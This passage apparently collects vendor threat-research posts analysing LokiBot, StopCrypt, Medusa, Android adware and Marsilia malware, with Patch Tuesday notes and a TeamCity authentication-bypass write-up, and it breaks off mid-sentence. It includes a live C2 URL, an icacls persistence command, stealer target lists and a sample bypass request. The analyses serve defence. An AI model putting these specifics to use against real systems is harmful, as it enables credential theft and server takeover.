Posts

LokiBot is Being Distributed by Windows Shortcut Files

Overview

The SonicWall RTDMI ™ engine has recently detected Windows Shortcut Files (LNKs) inside archives that execute LokiBot malware on the victim’s machine. The malicious LNK file is packed inside an archive along with a text file that says, “Find attached March Order” in Spanish, essentially pretending to be a legitimate file. The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and Living Off the Land (LOTL) techniques in past campaigns. The malware authors’ trend of using a low-profile file type as an initial vector keeps increasing, and they prefer the use of custom packers and protectors to prevent detection rather than updating the core executable code.

Figure 1: LNK file executing PowerShell to download LokiBot

Loader Executable

The downloaded executable is protected in two layers by the Confuser application to make the analysis difficult for the reversing engineers. After unpacking and de-obfuscating both of the layers, the actual code that is responsible for loading and executing the LokiBot executable is exposed. The LokiBot binary is kept RSA-encrypted and Base64-encoded in the resource of the loader executable, which is only visible after unpacking.

Figure 2: Encrypted LokiBot executable in the resource of loader executable

To get the RSA key, the malware computes MD5 of the string “UV?vgotlHR?P\Y?LEhgU]CdJIS?W;yBTkDZw??FTEi>Z” and self-concatenates the MD5 value by overwriting the last byte of the MD5. After doing Base64 decoding, the malware decrypts the encrypted executable data using an RSA algorithm with the below parameters:

Figure 3: Parameters

Figure 4: Code performing RSA decryption

 

The decrypted bytes are the string representation of the executable’s hex bytes, and a string-to-hex conversion is performed to finally get the LokiBot executable. The malware executes the LokiBot binary using the CreateProcessW API.

Figure 5: LokiBot binary string representation

LokiBot

LokiBot is an information stealer that has been active in the wild since 2015. It contains a rich list of applications that are used to steal data from the victim’s machine. After sending data to its C&C server, the malware receives commands to perform various actions on the victim’s machine.

Delayed Execution

The execution of LokiBot starts by examining the argument value for space-separated “-u” occurrences. The malware execution has been delayed by 10000 milliseconds for each occurrence of the value “-u”.

Figure 6: Checks process arguments

API Name Hashing

The malware uses API name hashing and resolves addresses just before invoking the APIs. To make the analysis difficult, the malware does not store the resolved API addresses, instead it loads and executes the API address from the accumulator register. If the malware needs to execute the same API more than once, it needs to resolve the API address again to invoke the API.

Hashing Algorithm

Code representation for the hashing module is in the C language and can be seen below. It generates a DWORD hash for the given array of bytes.

Figure 7: Hashing algorithm

Getting the Load Addresses of DLLs

An array of DLL names with a fixed length of 0x1A for each name is created by the malware. To resolve an API address, the malware calls a function with the index of the DLL names array and API name hash. The name of the DLL is retrieved from the DLL names array using the index value. The malware invokes the LoadLibraryW API to get the load address of the DLL, except for the kernel32 and ntdll DLLs. The malware considers kernel32 and ntdll to be already loaded into the memory and does PEB traversal to find the load address. It does this by comparing the DLL name hash with the loaded module name hashes.

Figure 8: Array of DLL names

Figure 9: Gets DLL load address

Resolving APIs Addresses

After getting the DLL load address either by calling the LoadLibraryW API or by PEB traversal, the malware enumerates the export directory of the loaded DLL and compares the requested API name hash with the exported API name hash to resolve the API address.

Single Instance Execution

The malware retrieves the MachineGUID from the registry entry “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography” to compute its MD5 string representation to the 12th byte, which is used as a mutex name. The malware attempts to create the mutex and examines the error value ERROR_ALREADY_EXISTS to terminate the current execution and ensure a single execution of the malware process. The mutex value for my system is “06E1A66DB87D112F02F38F7C” and is expected to always be the same for a given system. It is later sent to the Command and Control (C&C) server. The mutex name can help the malware author identify whether a system is reinfected or has been infected for the first time. Some of the character sequences of the mutex name are used by the malware as dropped file names and a directory name.

Figure 10: Creates mutex using machine GUID

If the malware fails to get the mutex name using MachineGUID, then it executes its backup code to compute a random mutex name using the system time.

Figure 11: Code to create an alternative random mutex

Stealing Application Data

The malware steals data from installed applications like browsers, SSH clients, document applications, password managers, email clients and FTP clients The data it steals includes login credentials, autofill web forms, document texts and more. The malware contains a total of 101 functions to steal data from the installed applications. The malware initializes the array of function pointers with the address of stealing functions and initializes another array with the respective argument values for the stealing functions. The malware invokes the stealing functions in a loop. It invokes them from the array of function pointers with the respective argument from the arguments array. The stealer functions keep the stolen data in a structured buffer along with their sizes.

Figure 12: Calling stealing functions

Browsers

The malware contains a list of chromium-based browsers, gecko-based browsers and other browsers to steal the stored data. For a gecko-based browser, malware reads the registry entry for the respective browser to get the installation directory and sets the installation directory into the environment path variable to smoothly load the nss3.dll which is used to decrypt the gecko-based browsers data. After decrypting the data, malware restores the environment path variable. The malware reads the profiles.ini file from the browser dedicated application data directory to get the list of profile directories. The malware enumerates each profile directory and uses multiple APIs (NSS_Init, GetInternalKeySlot, Authenticate, Decrypt, FreeSlot, FreeItem, CheckUserPassword, NSS_Shutdown) of nss3.dll, to decrypt data from the files mentioned below:

  • json
  • js
  • sqlite
  • txt
  • txt

For chromium-based browsers, the malware steals data from the files “Web Data” and “Login Data” placing them into respective application data folders for the browsers. For Edge and Internet Explorer, the malware steals data from Windows Password Manager and registry entry “Software\Microsoft\Internet Explorer\IntelliForms\Storage2”. The malware enumerates and retrieves credentials from the Windows Password Manager using multiple APIs (VaultEnumerateVaults, VaultOpenVault. VaultEnumerateItems, VaultGetItem, VaultFree, VaultCloseVault) of library vaultcli.dll.

Chromium-based Gecko-based Others
Dragon Mozilla Firefox Safari
ChromePlus SeaMonkey Opera Next
Chrome Flock Opera Stable
Nichrome Black Hawk QtWeb
RockMelt Cyberfox QupZilla
Spark IceDragon Internet Explorer
Chromium K-Meleon Opera
Titan Browser Lunascape
Torch Pale Moon
YandexBrowser Waterfox
Epic Privacy Browser
CocCoc
Vivaldi
Chromodo
Superbird
Coowon
Mustang Browser
360Browser
Citrio
Chrome SxS
Orbitum
Iridium

Figure 13: List of browsers

Apart from the browsers, the malware steals data from other installed applications which include SSH clients, FTP clients, email applications, document applications, password managers and more, which are mentioned in the table below:

Figure 14: List of applications to steal data

C&C Communication

The malware has an array to contain four C&C server addresses, however, in current variants, only one of the unique and valid C&C server addresses is found. After decrypting the C&C URL, the malware separates the IP address, port number, path and protocol to establish a connection.

Figure 15: Code for C&C communication

The malware compresses the stolen application data using aPLib compression library and appends into the structured buffer. The malware then prepares the HTTP post request with the user-agent “Mozilla/4.08 (Charon; Inferno)” and sends the stolen data to the C&C server. After sending the HTTP post request, the malware keeps the check sum of the data it sent into a file “C:\Users\Deepak\AppData\Roaming\DB87D1\112F02.hdb”. The directory name is taken from the mutex name’s character offsets from seven to 12, and the file name is taken from offsets 12 to 17.

Figure 16: Stolen data sent to the C&C server

An explanation of values sent by the malware to the C&C server is mentioned in the table below:

Offset Size Field Description Value
00 2 Version 12
02 2 Information type 27
04 2 IsUnicodeFlag 0
06 4 Size of binary ID 07
10 7 BinaryID ckav.ru
17 2 IsUnicodeFlag 1
19 4 Size of username 12
23 12 Username Deepak (Unicode)
35 2 IsUnicodeFlag 01
37 4 Size of computer name 30
41 30 Computer name DESKTOP-HQ11H51 (unicode)
71 2 IsUnicodeFlag 01
73 4 Size of computer name 30
77 30 Computer name DESKTOP-HQ11H51 (unicode)
107 4 Screen width 780
111 4 Screen height 438
115 2 IsUserAdmin 01
117 2 IsBuiltInAdministrator 00
119 2 PROCESSOR_ARCHITECTURE_AMD64 01
121 2 OS major version 10
123 2 OS minor version 00
125 2 Left over 6B
127 2 Related to service pack version 01
129 2 IsFirstPacketSent 00
131 2 Word value 1 00
133 2 Word value 0 00
135 2 Word value 0 00
137 2 Word value 0 00
139 4 Size of stolen data 20776
141 2 IsUnicodeFlag 01
145 4 Size of mutex name 30
149 48 Mutex name 06E1A66DB87D112F02F38F7C
197 4 Size of random string 5
201 5 Random string ytPeE
206 4 Size of compressed data 680
210 680 Compressed data 01 E1 48 01 B0 D9…

Figure 17: Description of the data sent to the C&C

After sending the stolen application data, the malware checks to see if the process is running in administrator mode to steal credentials stored in Windows Credential Manager. The malware enumerates files from the directory “%AppData%\Roaming\Microsoft\Credentials” using the APIs FindFirstFileW and FindNextFileW to read the encrypted data which is decrypted by accessing the process memory of lsass.exe.

Figure 18: Encrypted credentials in Windows Credential Manager

Decrypted credentials are compressed using aPLib compression library and appended into the structured buffer after malware variant-specific information and collected system information. It is then sent to the C&C server.

Figure 19: Decrypted credential from Windows Credential Manager

The malware creates the file “%APPDATA%\Roaming\DB87D1\112F02.lck” before attempting to decrypt credentials from Windows Credential Manager and deletes the files once the decryption routine is completed.

Figure 20: Creating the lock file

After sending the stolen data, the malware expects commands from the C&C server and spawns a separate thread to perform actions based on the received command.

Registry Entry

The malware creates a self-copy in the application data folder using a file move operation. If it fails in moving the file, then the malware uses the file copy operation. The malware creates a registry entry “HKCU\http://91.92.252.146:8015/wioy/five/fre.php\DB87D1” and sets the values as the path of the dropped file.

Figure 21: Registry entry

The malware modifies the attributes of the directory to the following values to lower the visibility:

  • FILE_ATTRIBUTE_HIDDEN
  • FILE_ATTRIBUTE_SYSTEM
  • FILE_ATTRIBUTE_NOT_CONTENT_INDEXED

Figure 22: Modifies directory attributes

The archive file cannot be found in any of the popular threat intelligence sharing portals like VirusTotal and ReversingLabs at the time of writing this blog, which indicates its uniqueness and limited distribution.

Figure 23: File is not available on Virus Total

Evidence of the detection by our RTDMI engine can be seen below in the Capture ATP report for this file.

Figure 24: Capture report

Microsoft Security Bulletin Coverage for March 2024

Overview
Microsoft’s March 2024 Patch Tuesday has 59 vulnerabilities – 26 of which are Elevation of Privilege. SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2024 and has produced coverage for 7 of the reported vulnerabilities.

Vulnerabilities with Detections

CVE CVE Title Signature
CVE-2024-21330 Azure Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability ASPY 546 Exploit-py py.MP_4
CVE-2024-21433 Windows Print Spooler Elevation of Privilege Vulnerability ASPY 549 Exploit-exe exe.MP_372

IPS 1134 GetCMD.dll File Download (SMB)

CVE-2024-21437 Windows Graphics Component Elevation of Privilege Vulnerability ASPY 547 Exploit-exe exe.MP_370
CVE-2024-26160 Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability ASPY 548 Exploit-exe exe.MP_371
CVE-2024-26170 Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability ASPY 552 Exploit-exe exe.MP_374
CVE-2024-26182 Windows Kernel Elevation of Privilege Vulnerability ASPY 551 Exploit-exe exe.MP_373
CVE-2024-26185 Windows Compressed Folder Tampering Vulnerability ASPY 550 Malformed-7z 7z.MP_1

 

Release Breakdown

The vulnerabilities can be classified into the following categories:

For March there are 57 critical, 2 important and zero moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery as well as those that have been disclosed publicly before the Patch Tuesday release for each month. The chart above displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE-2024-21392 .NET and Visual Studio Denial of Service Vulnerability
CVE-2024-21408 Windows Hyper-V Denial of Service Vulnerability
CVE-2024-21438 Microsoft AllJoyn API Denial of Service Vulnerability
CVE-2024-26181 Windows Kernel Denial of Service Vulnerability
CVE-2024-26190 Microsoft QUIC Denial of Service Vulnerability
CVE-2024-26197 Windows Standards-Based Storage Management Service Denial of Service Vulnerability

 

Elevation of Privilege Vulnerabilities

CVE-2024-21330 Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability
CVE-2024-21390 Microsoft Authenticator Elevation of Privilege Vulnerability
CVE-2024-21400 Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability
CVE-2024-21418 Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability
CVE-2024-21427 Windows Kerberos Security Feature Bypass Vulnerability
CVE-2024-21431 Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
CVE-2024-21432 Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-21433 Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2024-21434 Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
CVE-2024-21436 Windows Installer Elevation of Privilege Vulnerability
CVE-2024-21437 Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-21439 Windows Telephony Server Elevation of Privilege Vulnerability
CVE-2024-21442 Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21443 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-21445 Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21446 NTFS Elevation of Privilege Vulnerability
CVE-2024-26165 Visual Studio Code Elevation of Privilege Vulnerability
CVE-2024-26169 Windows Error Reporting Service Elevation of Privilege Vulnerability
CVE-2024-26170 Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability
CVE-2024-26173 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26176 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26178 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26182 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26199 Microsoft Office Elevation of Privilege Vulnerability
CVE-2024-26201 Microsoft Intune Linux Agent Elevation of Privilege Vulnerability
CVE-2024-26203 Azure Data Studio Elevation of Privilege Vulnerability

 

Information Disclosure Vulnerabilities

CVE-2024-21448 Microsoft Teams for Android Information Disclosure Vulnerability
CVE-2024-26160 Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
CVE-2024-26174 Windows Kernel Information Disclosure Vulnerability
CVE-2024-26177 Windows Kernel Information Disclosure Vulnerability
CVE-2024-26204 Outlook for Android Information Disclosure Vulnerability

 

Remote Code Execution Vulnerabilities

CVE-2024-21334 Open Management Infrastructure (OMI) Remote Code Execution Vulnerability
CVE-2024-21407 Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-21411 Skype for Consumer Remote Code Execution Vulnerability
CVE-2024-21426 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-21429 Windows USB Hub Driver Remote Code Execution Vulnerability
CVE-2024-21430 Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability
CVE-2024-21435 Windows OLE Remote Code Execution Vulnerability
CVE-2024-21440 Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21441 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21444 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21450 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21451 Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26159 Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26161 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26162 Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26164 Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability
CVE-2024-26166 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26198 Microsoft Exchange Server Remote Code Execution Vulnerability

 

Security Feature Bypass Vulnerabilities

CVE-2024-20671 Microsoft Defender Security Feature Bypass Vulnerability

 

Spoofing Vulnerabilities

CVE-2024-21419 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2024-21421 Azure SDK Spoofing Vulnerability

 

Tampering Vulnerabilities

CVE-2024-26185 Windows Compressed Folder Tampering Vulnerability

 

Interesting Multi-Stage StopCrypt Ransomware Variant Propagating in the Wild

Overview

The SonicWall Capture Labs threat research team recently observed an interesting variant of StopCrypt ransomware. The ransomware executes its malicious activities by utilizing multi-stage shellcodes before launching a final payload that contains the file encryption code.

Infection Cycle

At the start of execution, it creates a string of msim32.dll on the stack, and, using LoadLibrary, loads the Dll. The significance of why it is doing this is a mystery, as that is not used in the process.

It has a long, time-delaying loop of 65,18,40,312 iterations wherein the same data is copied to a location and the count is incremented. Many more similar loop-delaying techniques are used throughout the malware execution.

The possible reason for using such techniques is to evade detection. These loops serve a nefarious purpose: to thwart time-sensitive sandboxes and security mechanisms by artificially prolonging the execution time of the malicious code.

Figure 1:  Loop for delaying time

Next, it allocates the memory using LocalAlloc API, and it then uses VirtualProtect to change the permission of the memory block to READ, WRITE and EXECUTE.

First Stage Payload

In this stage, it dynamically resolves the required APIs using the Kernel_GetProcAddress API.

The Ransomware constructs API function calls by constructing the function names or strings containing API names directly on the stack. It does this instead of using straightforward API calls, which can be easily identified and analyzed by security tools.

Figure 2: Constructing API names on the stack

The malware resolves the addresses of the following APIs:

  • GlobalAlloc
  • VirtualAlloc
  • SetLastError
  • Sleep
  • CreateToolHelp32Snapshot
  • Module32First
  • CloseHandle

CreateToolhelp32Snapshot is utilized to take a snapshot of the current process that includes all its modules (0x8 = TH32CS_SNAPMODULE):

Figure 3: Kernel32_ CreateToolhelp32Snapshot Win32 API call

The Ransomware extracts information about the first module of the process using the Module32First API.

It then calls the VirtualAlloc API to allocate the memory with READ, WRITE and EXECUTE permissions.

Second Stage of Payload

In this stage, the primary task of the shellcode is to perform process hollowing.

API function names are also dynamically created on the stack during this phase.

Figure 4: Constructing API names on the stack

The malware resolves the addresses of the following APIs:

  • MessageBoxA
  • GetMessageExtraInfo
  • WinExec
  • CreateFileA
  • WriteFile
  • CloseHandle
  • CreateProcessA
  • GetThreadContext
  • VirtualAlloc
  • VirtualAllocEx
  • VirtualFree
  • ReadProcessMemory
  • WriteProcessMemory
  • SetThreadContext
  • ResumeThread
  • WaitForSingleObject
  • GetModuleFileNameA
  • GetCommandLineA
  • NtUnmapViewOfSection
  • NtWriteVirtualMemory
  • RegisterClassExA
  • CreateWindowExA
  • PostMessageA
  • GetMessageA
  • DefWindowProcA
  • GetFileAttributesA
  • GetStartupInfoA
  • VirtualProtectEx

The Ransomware then checks the FileAttributes of the non-existent file “apfHQ” using the kernel32_GetFileAttributesA API.

Figure 5: Kernel32_GetFileAttributesA Win32 API call

The purpose for this operation is not known – this could be a marker to identify specific systems where the file might be present.

The file then registers a window class called “saodkfnosa9uin” using the user32_RegisterClassExA API.

Figure 6: Kernel32_RegisterClassExA Win32 API call

It then calls user32_CreateWindowExA API to create the window.

The ransomware calls the VirtualAlloc API to allocate the memory with READ, WRITE permissions

to store the path returned by the GetModuleFileNameA API. The path is the current location from where the ransomware is running. Next, it calls the kernel32.GetStartupInfoA API to retrieve startup information.

Figure 7: Kernel32_GetStartupInfoA Win32 API call

Using the kernel32_CreateProcessA API, it launches its own copy as a new process in a suspended state. This is where the process hollowing begins.

Figure 8: Kernel32_CreateProcessA Win32 API call

The GetThreadContext API is called to retrieve the context of a specific thread:

Figure 9: Kernel_ GetThreadContext  Win32 API call

The ReadProcessMemory API is used to get the loaded base address of the image.

The Ntdll_NtUnmapViewOfSection API is used to unmap a view of a section from the virtual address space of the process.

Figure 10: Ntdll_NtUnmapViewOfSection Win32 API call

The VirtualAllocEx API is used to allocate new space in the newly created process.

Figure 11: Kernel32_ VirtualAllocEx Win32 API call

The Ntdll_NtWriteVirtualMemory API is used multiple times to write the data into the memory of the newly created process which is in a suspended state.

Figure 12: Ntdll_NtWriteVirtualMemory Win32 API call

Once the section by section data is written into the memory of the remote suspended process, it calls the Kernel32_SetThreadContext API. The SetThreadContext API  is used to set the context for the remote thread:

Figure 13: Kernel32_SetThreadContext Win32 API call

The ResumeThread API is used to start the execution of the thread process that was in a suspended state.

Final Payload

The ransomware then launches a resumed process with the following parameter: “–Admin IsNotAutoStart IsNotTask.”

Figure 14: Launching process with “–Admin IsNotAutoStart IsNotTask” as a parameter

The ransomware creates a new directory in C:\\Users\<user_name>\AppData\Local and copies the current malware image(binary) into it.

It then launches the “icacls.exe” process, which is the command-line utility used to view and modify access control lists (ACLs) in Windows.

The command icacls.exe <path> /deny “s-1-1-0:(OI)(CI)(DE,DC) is used to deny permissions to a specific security identifier (SID) on a file or directory in Windows.

Overall, this command denies the “Everyone” group permission to delete the specified file or directory and its contents, effectively restricting their ability to modify or delete it.

Figure 15: Using the Icacls command to deny permission for deleting file or directory

The ransomware creates a scheduled task that executes a copy of the final payload with a command line argument –Task, every five minutes.

Figure 16: Task added in the task scheduler.

The ransomware encrypts the files and appends the .msjd extension to the encrypted files.

Figure 17: Ransomware encrypted filenames

The ransomware note is kept in every encrypted folder as _readme.txt

Figure 18: Ransomware note

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: StopCrypt.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

*this blog was originally titled in a way that indicated that this was a new ransomware variant, but this was done in error and has been corrected

Medusa Ransomware Continues Attacks on US School Districts

Overview

The SonicWall Capture Labs threat research team has been tracking ransomware that has gained recent notoriety known as Medusa. Medusa surfaced as a Ransomware-as-a-Service (RaaS) platform in late 2022. The group behind Medusa predominantly propagates this malware through unpatched vulnerabilities and directs their attacks on various industry sectors such as technology, education, manufacturing, healthcare and retail. Most attacks have occurred in the United States, but other countries such as the U.K., France, Italy, Spain and India have been affected by this ransomware over the last year. The copy of Medusa we obtained was aimed at the Glendale Unified School District in California. It is reported that the attackers demanded $1M in Bitcoin for file retrieval and deletion of exfiltrated student data. Glendale is not the only school district to be targeted. Hinsdale School District in New Hampshire, and the Campbell County Schools in Kentucky are also reported to have been recently hit by Medusa ransomware.

Infection Cycle

As is typical with ransomware, files are immediately encrypted at runtime. They are marked with a .MEDUSA file extension. During encryption, a file named READ_ME_MEDUSA!!!.txt is dropped into the corresponding directories:

READ_ME_MEDUSA!!!.txt contains the following message:

We tried accessing the tOr link using tOr browser, but the site was not fully functional:

Running the malware normally yields no text output.  However, running it within our reverse engineering analysis engine allowed us to view its internal PowerShell script running in real-time as it performed various malicious operations:

Spying on API calls used by the malware during its operation allows us to inspect its behavior in real-time. There are 44 applications that it attempts to kill if running:

There are 184 services that it tries to stop. These include various antivirus services, databases, backup services, email servers etc.

It also stops shadow copies, using the vssadmin application:

We tried reaching out to the Proton Mail email address provided, but it was no longer active:

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Medusa.RSM_4(Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Android Adware Hidden Behind the Facade of Gaming Icons

Overview

The SonicWall Capture Labs Threat research team has regularly monitored hidden adware on Android. These misleading apps show ads and collect user data to make money from advertisements. They trick users into clicking on ads, earning revenue through both displays and clicks.

Recently, numerous instances of adware have been disguising themselves as well-known gaming apps, regardless of whether they are free or paid. This tactic aims to deceive users specifically during the installation process.

Figure 1: App icons used by malware

Infection Cycle

The critical permissions used in these apps are mentioned below:

  • INTERNET
  • SYSTEM_ALERT_WINDOW
  • FOREGROUND_SERVICE
  • RECEIVE_BOOT_COMPLETED
  • QUICKBOOT_POWERON
  • SCHEDULE_EXACT_ALARM

Figure 2: Icon of a genuine paid app used by malware

Once the user clicks on the app icon, it disappears from the app drawer. To view the installed app, information users need to go to “Settings -> App Option”.

Figure 3: Code to hide malicious app from the app drawer

It fetches the URL “hxxp://1downloadss0ftware[.]xyz/gogo/install” from the resource directory.

Figure 4: res directory info

The code below loads malicious URLs into a WebView and then continuously displays advertisements on the device.

Figure 5: URL loaded into WebView

The malicious app loads a URL to showcase various ads in the default browser. All these ads consistently line up in the same web browser.

Figure 6: Showing ads in the default browser

Figure 7: Lined-up ads

The “createScreenCaptureIntent” method is used to initiate the process of capturing the screen content of a device that is infected by the malware.

Figure 8: Screen capture

The code below is designed to respond to screen on and off events.

Figure 9: Checks Device Status

Using JSON, the malware collects device information

Figure 10: Collects device information

URLs

  • hxxp://1downloadss0ftware[.]xyz
  • hxxps://adsforapp1[.]com
  • hxxps://onetouch23[.]info

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOCs)

  • 6f24a2614dbbb4bcfd0422101ec9dbd8f2cc566500562a5191b24adf6b1cf7e0
  • 9ad72da43509fc05156f8ac8e2c107080e881ab9ec9e9bd6b97db4040bca380f
  • b02f787e204b5c4430ea7589e2bd5640feb503db5158aa9681baa1d4e8e60335
  • e363450bbb579e4398461e3a6f647378bdacfc856280f6ad3db2a6f628b57fcb
  • ed57a701ed3a80e9532f530e6b9b6a79560d44061a0032464109a273bc34d482
  • 1976fb538d0b7c063cd13df009b3b7923d6080ff0cbbc12a869185c11b97ba46
  • f339ea055ce21dd38585af98e85b61dd988ca75a932f20e177f4ba3d6c54d6aa
  • b09250f248f08dcfc1e5521988ae6a28aa12fd8119e35746d4f17bd0b27376bc
  • d62be270b176efcb2928ac84afcff127c0c5b5c8f6f149dca26c06df6a535dc2

JetBrains TeamCity Authentication Bypass Vulnerabilities

Overview

The SonicWall Capture Labs threat research team became aware of a couple of noteworthy vulnerabilities — an authentication bypass vulnerability and a path traversal vulnerability — in JetBrains TeamCity, assessed their impact and developed mitigation measures for them. TeamCity, a build management and continuous integration server, published an advisory on these vulnerabilities which affect versions before 2023.11.4. Considering the sizeable user base as well as the low attack complexity, TeamCity users are strongly encouraged to upgrade their instances to the latest versions with utmost priority.

CVE Details

Authentication Bypass Vulnerability

The authentication bypass vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-27198.

The CVSS score is 9.8 based on the metrics (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Path Traversal Vulnerability

The path traversal vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-27199.

The CVSS score is 7.3 based on the metrics (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).

Technical Overview

CVE-2024-27198

This vulnerability allows threat actors to circumvent the authentication mechanism by sending a crafted request to the web server. The flaw is in the functionality of the jetbrains.buildServer.controllers.BaseController class of the web-openapi.jar library. As seen in the code shared by rapid7 in Figure 1, if a request is served by the handleRequestInternal method in the BaseController class and not redirected by issuing 302 status code, then it will lead to execution of the updateViewIfRequestHasJspParameter method.

Figure 1: handleRequestInternal method of BaseController class, source: rapid7

Another piece of code, as seen in Figure 2, defining the method updateViewIfRequestHasJspParameter reveals that the unauthenticated attacker needs to make sure that the modelAndView has a name and does not terminate with .jsp. Requesting a non-existent URI that generates a 404 response and renders a /404.html page would result in the variable isControllerRequestWithViewName becoming true and the method getJspFromRequest will be called.

Figure 2: updateViewIfRequestHasJspParameter method, source: rapid7

The method getJspFromRequest is the one that captured the imagination of the attackers as it allows them to render an arbitrary endpoint by specifying the value in a parameter named jsp, as seen in Figure 3. Although it does not only require the endpoints to terminate with .jsp but also makes sure that it does not contain the confined path /admin/, the parameters can be tricked to access the arbitrary endpoints by an unauthenticated threat actor which normally requires authentication. 

Figure 3: getJspFromRequest method, source: rapid7

CVE-2024-27199

This vulnerability allows the threat actors to gain unauthenticated access to a limited number of authenticated endpoints due to a path traversal issue present in some of the endpoints such as /res/, /update/ and /.well-known/acme-challenge/. The attacker can make use of those paths along with path traversal vectors to reach other restricted endpoints by circumventing the authentication checks.

Triggering the Vulnerability

CVE-2024-27198

Leveraging this authentication bypass vulnerability requires the attacker to meet the following requisites:

  1. Render a 404 response by requesting a non-existing path, for instance, /sw
  2. Set a value of jsp query parameter in the request to the desired path which requires authentication, for example, ?jsp=/app/rest/server
  3. Make sure the crafted URI terminates with .jsp. The path can be ended by appending an HTTP path parameter or a query string segment such as ;.jsp or ?.jsp

The example request would look like, http[:]//sw-test[.]local:8111/sw?jsp=/app/rest/server?.jsp

Accessing the authenticated endpoint /app/rest/server by exploiting this vulnerability is demonstrated in the video below.

CVE-2024-27199

Triggering this path traversal vulnerability requires the threat actor to send a crafted request utilizing the endpoints discussed in the overview section to reach number of pages that may expose sensitive information and/or let the attacker alter system configurations. For instance, the video illustrating the unauthenticated access to some of the endpoints /app/https/settings/certificateInfo and /admin/diagnostic.jsp is shown below.

 

Exploitation

CVE-2024-27198

Exploitation of this vulnerability yields the attacker a commanding position over a TeamCity server by adding a new admin user, as seen in the video below, and complete control over builds and projects hosted on the server which can open the door for them to execute a sophisticated supply chain attack.

CVE-2024-27199

Exploitation of this vulnerability yields the attacker sensitive information as well as the ability to modify some of the server configurations such as uploading a custom HTTPS certificate and specifying the listening port for the HTTPS service using a self-signed certificate.

This flaw can be exploited by nefarious attackers to execute either a denial-of-service (DoS) attack by modifying the HTTPS listening port or a man-in-the-middle (MITM) attack, since the attacker owns the private key of the modified certificate.

 

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

CVE-2024-27198

  • IPS: 15969 and 15970

CVE-2024-27198

  • IPS: 15966, 15967 and 15968

Remediation Recommendations

Considering the severe consequences of this vulnerability as well as the reports of mass-generation of admin accounts using the exploit, users are strongly encouraged to upgrade their instances as published in the vendor advisory.

Relevant Links

New Marsilia Ransomware Downloader Found

Overview

This week, the SonicWall Capture Labs threat research team analyzed a sample of Marsilia malware, also known as Mallox. This is a multi-stage sample that, when functional, will have a first stage that enumerates system information and creates persistence. The second stage is then downloaded and will perform data extraction and encryption for ransomware purposes.

Technical Analysis

The sample is detected as a .NET binary protected with SmartAssembly, although the main parts of the files’ operations are still in plaintext.

Figure 1: Sample detection

Figure 2: Plaintext address in strings

Running de4dot to remove SmartAssembly changes very little in terms of function readability.

Figure 3: Before (red) and after (green) deobfuscation

During runtime, the malware will query the system volumes and install persistence using the following registry key:

‘HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate’ .

Language, locale, and security (WMI) registry keys are enumerated through as well as application logs for virtual environment strings. During testing, most keys were not on the target system. The application sets the threads in memory with write watch and enables debug mode to check for analysis tools. It can also sleep for extensive periods as an evasion technique.

Figure 4: Sample will enumerate through languages, locales

Figure 5: Using WMI to enumerate for system applications and devices

Figure 6: Time to sleep after sustained connection failure, in seconds

During testing, the sample bound itself to ports 49729 – 49970 and reached out to the following address:

